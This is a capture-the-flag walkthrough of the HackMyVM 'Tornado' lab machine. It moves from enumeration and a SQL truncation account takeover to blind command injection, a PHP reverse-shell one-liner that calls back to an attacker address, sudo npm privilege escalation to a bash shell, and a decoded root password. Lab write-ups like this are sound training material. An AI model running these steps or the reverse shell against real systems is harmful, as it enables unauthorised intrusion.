# HackMyVM - Tornado

##### Credit to the creator of the VM @catch_me75

---

Now, as always, let's start with an nmap scan.

**Enumeration**

```text
# Nmap 7.91 scan initiated Wed Dec 30 10:01:46 2020 as: nmap -sC -sV -p22,80 -oN nmap IP
Nmap scan report for tornado (IP)
Host is up (0.00064s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 0f:57:0d:60:31:4a:fd:2b:db:3e:9e:2f:63:2e:35:df (RSA)
|   256 00:9a:c8:d3:ba:1b:47:b2:48:a8:88:24:9f:fe:33:cc (ECDSA)
|_  256 6d:af:db:21:25:ee:b0:a6:7d:05:f3:06:f0:65:ff:dc (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:45:15:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 30 10:01:53 2020 -- 1 IP address (1 host up) scanned in 7.62 seconds
```

Once we visit the website we see the Apache2 default page, so let's fire up gobuster and enumerate port 80.

```bash
gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt
```

```text
/index.html (Status: 200)
/manual (Status: 301)
/javascript (Status: 301)
/bluesky (Status: 301)
/server-status (Status: 403)
```

We have a /bluesky directory and nothing special there... uuhm. Let's enumerate this one.
![](https://i.imgur.com/8oVlVvx.png)

```bash
gobuster dir -q -u http://$ip/bluesky -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt
```

```text
/index.html (Status: 200)
/contact.php (Status: 302)
/about.php (Status: 302)
/login.php (Status: 200)
/signup.php (Status: 200)
/css (Status: 301)
/imgs (Status: 301)
/js (Status: 301)
/logout.php (Status: 302)
/dashboard.php (Status: 302)
/port.php (Status: 302)
```

We can see a login page.

![](https://i.imgur.com/v6o2Rrk.png)

Let's have a look at the source code.

```html
<input type="text" name="uname" placeholder="email" maxlength="13"><br><br>
<input type="password" name="upass" placeholder="password"><br><br>
<input type="submit" value="Login" name="btn" class="button"><br>
```

We can see that the maximum character length of the email field is 13. There was another page, signup.php. Have a look at it and sign up.

![](https://i.imgur.com/cyQQW6x.png)

In the dashboard we can navigate between home, about and portfolio. Only the contact page cannot be viewed: the comment feature has been turned off for security purposes. In the source code of "Portfolio", we find a hint.

![](https://i.imgur.com/M4icVZO.png)

Mmh... interesting! Let's check it out. I tried an LFI vulnerability to access the imp.txt file but got nothing. Then I remembered that Apache can be configured with an alias for user directories, and that on Linux `cd ~user` means the home directory of that user, so I thought I'd give ~tornado a try, and there I found the imp.txt.

![](https://i.imgur.com/1bZpXwK.png)

**imp.txt**

```text
ceo@tornado
cto@tornado
manager@tornado
hr@tornado
lfi@tornado
admin@tornado
jacob@tornado
it@tornado
sales@tornado
```

We find several emails, and I tried them all against the login with the rockyou wordlist. The only password I found was **admin@tornado:hello**, but that turned out to be a rabbit hole... we do not find anything new after we are logged in.
---

**Do you remember the maximum character length of 13?** This brings me to the SQL Truncation Attack. SQL truncation is a very interesting flaw in the database layer: when an input is longer than the column it is stored in, the database silently cuts it down to the column width. The uniqueness check at signup sees a 15-character string that does not exist yet, but the value actually stored is only the first 13 characters, so a second row with an existing user's email is created. Successful exploitation leads to user account compromise, as it means an attacker can access any user's account with his own password. Sounds interesting!

```html
<input type="text" name="uname" placeholder="email" maxlength="13">
```

Change the maxlength from 13 to 15:

```html
<input type="text" name="uname" placeholder="email" maxlength="15">
```

Let's not waste time and register with the jacob@tornado email followed by one space and one character.

![](https://i.imgur.com/RV3cnHB.png)

So we registered jacob through this form and then logged in to the application. "Welcome User jacob@tornado": successfully logged in. We find a comment field on the contact page that was not available before.

![](https://i.imgur.com/VvUUVPe.png)

Here's the tricky part: if you run the `id` command through the contact page, it will not show you any output. Using a `sleep 30` command confirmed, by the delayed response, that this is a blind RCE vulnerability.

## Shell as www-data

Use a PHP reverse shell and start a Netcat listener.

```bash
php -r '$sock=fsockopen("Ip",Port);exec("/bin/sh -i <&3 >&3 2>&3");'
```

```text
www-data@tornado:/var/www/html/bluesky$ whoami && id
whoami && id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@tornado:/var/www/html/bluesky$
```

**sudo -l**

```text
(catchme) NOPASSWD: /usr/bin/npm
```

npm is a package manager for the JavaScript programming language.

## Road to User

First I created an index.js file:

```bash
cd /tmp
mkdir shell
echo 'module.exports = install could be dangerous' > index.js
cp index.js shell
```

Now we need a package.json file, and chmod to make it executable.
```json
{
  "name": "shell",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "shell": "/bin/bash"
  },
  "author": "",
  "license": "ISC"
}
```

Finally, execute the script:

```bash
sudo -u catchme npm run-script shell
```

![](https://i.imgur.com/8ckPhwI.png)

![](https://i.imgur.com/NMCOuEB.png)

## Shell as root

I enumerated a lot but I really didn't find anything exploitable. In the home directory of catchme you will find a Python script called enc.py. It's a keyed Caesar cipher, similar to rot13. Find the encrypted string inside and either rewrite the code, or go to this website (http://rumkin.com/tools/cipher/caesar-keyed.php) and enter each letter individually, for example: a, b, c, d, e...

**Once you have done it correctly, you will find the root password :)**

![](https://i.imgur.com/QxILek8.png)

---

Tornado created by **catch_me75** (thank you)

This machine can be found at **HackMyVM** **-->** Check it out! https://hackmyvm.eu